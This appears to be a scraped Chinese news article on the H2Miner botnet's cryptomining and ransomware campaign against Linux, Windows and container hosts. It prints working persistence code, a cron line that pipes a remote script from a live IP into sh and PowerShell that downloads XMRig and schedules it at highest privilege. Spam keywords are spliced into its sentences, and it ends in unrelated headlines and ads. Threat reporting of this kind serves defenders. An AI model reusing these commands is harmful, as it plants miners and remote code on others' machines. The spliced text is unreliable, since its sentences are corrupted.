首次发现于2019年末的僵尸及容H2Miner僵尸网络近期卷土重来 ,其攻击手段已突破加密货币劫持与勒索软件的网络挖矿界限 。最新攻击活动利用廉价虚拟专用服务器(VPS)和多种常见恶意软件 ,攻击同时入侵Linux主机、器设Windows工作站和容器工作负载。备进
攻击者通过组合云环境感知脚本 、行门跨平台编译二进制文件以及系统原生命令,罗币能在防御者察觉CPU负载异常前快速建立门罗币挖矿通道。源码库僵尸及容攻击始于对配置错误服务或漏洞应用的网络挖矿利用 ,包括Apache ActiveMQ(CVE-2023-46604)和Log4Shell漏洞。攻击 入侵成功后 ,器设僵尸网络会部署定制化加载脚本——Linux系统使用ce.sh,备进Windows系统使用1.ps1——这些脚本会终止其他挖矿进程、行门禁用终端防护 ,罗币并从78.153.140.66下载XMRig挖矿程序 。僵尸及容容器环境同样遭受攻击 :spr.sh脚本会扫描Docker镜像并移除阿里云的建站模板aegis防护代理 ,随后植入Kinsing恶意软件。 复合型攻击基础设施同一攻击基础设施还托管着位于47.97.113.36的Cobalt Strike团队服务器 ,以及伪装成"MicrosoftSoftware.exe"的Bitbucket代码仓库,显示出成熟的多层命令与控制(C2)架构。Fortinet分析师发现,服务器租用新型VBScript勒索软件Lcrypt0rx已与挖矿程序捆绑传播。
虽然其加密算法较为简单——采用8,192字符的XOR密钥结合文件专属盐值——但该脚本仍会覆写主引导记录(MBR),并在系统中散布伪装持久化钩子。
钱包地址与托管服务器的重叠表明,当前攻击者可能与H2Miner原始团队存在协作或从属关系 。 持久化机制剖析H2Miner通过分层感染链实现持久化 。初始脚本会枚举防御进程 ,免费模板使用暴力正则表达式终止这些进程,并通过清除命令历史来抹除攻击痕迹。
Linux系统中,ce.sh会植入每10分钟自我重下载的cron计划任务 : 复制( crontab -l 2>/dev/null ; \ echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -1.2.Windows系统则通过1.ps1脚本将XMRig注册为计划任务: 复制$miner = "$env:TEMP\sysupdate.exe" Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner schtasks /create /f /tn "Update service for Windows Service" ` /tr "$miner" /sc minute /mo 15 /rl highest1.2.3.4. 复合防御策略需求在Windows平台,Lcrypt0rx通过Shell.Application提权后 ,会尝试修改Winlogon Shell和映像劫持(IFEO)注册表键实现持久化 。虽然注册表逻辑存在缺陷 ,但恶意软件通过部署6个辅助脚本(从循环执行杀毒软件终止的云计算advapi32_ext.vbs,到基础自传播脚本USB_bridge.vbs)确保存活。
这些辅助脚本均以隐藏系统文件属性(+h +s +r)投放 ,并通过注册表自启动项调用。配合cpr.sh等频繁更新的脚本,即使部分组件被清除,僵尸网络仍能重建挖矿通道。防御者需全面清理容器镜像、高防服务器计划任务 、cron条目和异常注册表键 ,否则门罗币钱包(如4ASk4RhU...p8SahC)将在警报解除后持续窃取计算资源。 |
戴尔数据泄露事件:测试实验室平台遭 World Leaks 黑客组织入侵原来这才是2022企业都愿意选择云服务器的原因Windows 截图工具 Greenshot 曝高危漏洞 可执行任意代码(PoC已公开)「以X1Carbon修图怎么样?」(优秀性能与超高分辨率屏幕,X1Carbon是专业修图的首选!)0day 漏洞量产?AI Agent “生产线”曝光神舟战神笔记本电脑质量如何?(探索神舟战神笔记本电脑的品质与性能)将安全内建于开发流程中:威胁应对分步指南(Build Security In) - 上体验音乐新境界,BOSEQC35带来震撼音质!(逆袭耳朵的,QC35成为音乐控的首选!)谷歌 Chrome 零日漏洞遭广泛利用,可执行任意代码戴尔科技PowerScale在IDC行业追踪报告中年年保持销量冠军香港物理机网站建设亿华云b2b信息平台源码库云服务器企业服务器